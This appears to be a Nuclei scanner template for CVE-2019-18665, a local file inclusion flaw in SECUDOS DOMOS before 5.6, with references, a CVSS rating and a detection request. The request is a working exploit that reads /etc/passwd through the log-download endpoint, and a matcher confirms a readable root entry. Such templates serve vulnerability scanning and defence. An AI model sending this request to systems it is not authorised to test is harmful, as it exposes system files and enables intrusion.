nuclei-templates/cves/2019/CVE-2019-18665.yaml

38 lines
953 B
YAML

id: CVE-2019-18665
info:
name: DOMOS 5.5 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
SECUDOS DOMOS before 5.6 allows local file inclusion via the log module.
reference:
- https://atomic111.github.io/article/secudos-domos-directory_traversal
- https://vuldb.com/?id.144804
- https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
- https://nvd.nist.gov/vuln/detail/CVE-2019-18665
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-18665
cwe-id: CWE-22
tags: cve,cve2019,domos,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/08